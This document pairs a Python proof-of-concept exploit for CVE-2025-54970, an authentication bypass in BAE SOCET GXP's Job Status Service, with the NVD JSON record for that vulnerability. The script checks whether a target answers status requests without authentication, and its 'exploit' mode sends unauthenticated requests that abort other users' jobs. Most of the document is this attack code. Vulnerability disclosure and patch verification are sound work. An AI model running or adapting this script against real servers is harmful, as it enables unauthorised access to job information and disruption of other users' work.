CVE-2025-54970

import requests import sys # CVE-2025-54970 PoC - BAE SOCET GXP Job Status Service Authentication Bypass # Target: BAE SOCET GXP < 4.6.0.2 # Attack Type: Authentication Bypass leading to Unauthorized Job Access TARGET_HOST = "http://target-socet-gxp-server" JOB_STATUS_ENDPOINT = f"{TARGET_HOST}/api/job/status" JOB_ABORT_ENDPOINT = f"{TARGET_HOST}/api/job/abort" def check_vulnerability(): """Check if target is vulnerable to CVE-2025-54970""" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/json' } # Attempt to read job status without authentication try: response = requests.get(JOB_STATUS_ENDPOINT, headers=headers, timeout=10) if response.status_code == 200: print(f"[!] Target is VULNERABLE - Job Status accessible without auth") print(f"[*] Response: {response.text[:200]}") return True elif response.status_code == 401 or response.status_code == 403: print(f"[*] Target appears PATCHED - Auth required for job status") return False else: print(f"[*] Unexpected response: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None def exploit_job_abort(job_id): """Exploit authentication bypass to abort jobs without permission""" headers = { 'User-Agent': 'Mozilla/5.0', 'Content-Type': 'application/json' } data = {'job_id': job_id} try: response = requests.post(JOB_ABORT_ENDPOINT, json=data, headers=headers, timeout=10) if response.status_code == 200: print(f"[!] Successfully aborted job {job_id} without authorization") return True else: print(f"[*] Job abort failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[!] Exploit failed: {e}") return False if __name__ == "__main__": print("CVE-2025-54970 PoC - BAE SOCET GXP Job Status Service Auth Bypass") print("=" * 70) if len(sys.argv) > 1: if sys.argv[1] == "check": check_vulnerability() elif sys.argv[1] == "exploit" and len(sys.argv) > 2: exploit_job_abort(sys.argv[2]) else: print("Usage:") print(" python cve-2025-54970.py check") print(" python cve-2025-54970.py exploit <job_id>")

{"cve": {"id": "CVE-2025-54970", "sourceIdentifier": "[email protected]", "published": "2025-10-27T17:15:38.703", "lastModified": "2025-10-31T20:29:08.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in BAE SOCET GXP before 4.6.0.2. The SOCET GXP Job Status Service fails to authenticate requests. In some configurations, this may allow remote or local users to abort jobs or read information without the permissions of the job owner."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:baesystems:socet_gxp:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.6.0.2", "matchCriteriaId": "6BF9E6F9-E4EA-4880-9B20-2CEDD7D118C8"}]}]}], "references": [{"url": "https://www.baesystems.com/en-us/product/geospatial-exploitation-products", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.geospatialexploitationproducts.com/content/socet-gxp/vulnerabilities-disclosure/#cve-2025-54970", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}